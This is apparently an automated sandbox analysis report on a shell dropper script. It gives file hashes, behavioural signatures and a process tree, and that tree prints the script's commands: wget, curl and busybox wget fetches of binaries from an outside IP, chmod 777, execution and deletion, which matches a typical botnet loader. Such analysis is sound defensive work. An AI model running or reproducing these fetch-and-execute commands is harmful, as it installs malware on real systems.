Analysis
-
max time kernel
77s -
max time network
76s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
-
Size
10KB
-
MD5
1aa70b102e8502c836ea31a0cfc2110e
-
SHA1
5664c3b03291a47c9ca9e7d8d593334b1270ef62
-
SHA256
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0
-
SHA512
86734e2ee4c55c4bbbd31cf846a5d177eb0dc2fc70fdf9c4bf2c6bd50fe1b3b674526e6fe42a863d3064d6f87c832c15fe45c472693d96547042f11a718d0084
-
SSDEEP
192:UuW+7fLn0OZXluW8fzFywuW+7fznQ4uW8fzU:0OZXoyUa
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 940 chmod 898 chmod 958 chmod 964 chmod 988 chmod 851 chmod 874 chmod 886 chmod 928 chmod 952 chmod 811 chmod 880 chmod 982 chmod 1000 chmod 760 chmod 892 chmod 922 chmod 946 chmod 976 chmod 994 chmod 865 chmod 934 chmod 823 chmod 904 chmod 910 chmod 970 chmod 776 chmod 916 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 761 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 812 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 824 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 853 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 866 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 875 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 881 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 887 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 893 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 899 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 905 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 911 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 917 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 923 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 929 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 935 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 941 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 947 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 953 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 959 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 965 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 971 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 977 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 983 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 989 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 995 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 1001 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl
Processes
-
/tmp/1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh/tmp/1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh1⤵PID:730
-
/bin/rm/bin/rm bins.sh2⤵PID:735
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:740
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:759
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:762
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:763
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:770
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:780
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:782
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:802
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:817
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:822
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:842
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:858
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:864
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:867
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:868
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:870
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:876
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:877
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:879
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:885
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:891
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:897
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:903
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:909
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:912
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:913
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:915
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:918
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:919
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:921
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:924
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:925
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:927
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:930
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:931
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:933
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:936
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:937
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:939
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:942
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:943
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:945
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:948
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:949
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:951
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:954
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:955
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:957
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:960
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:961
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
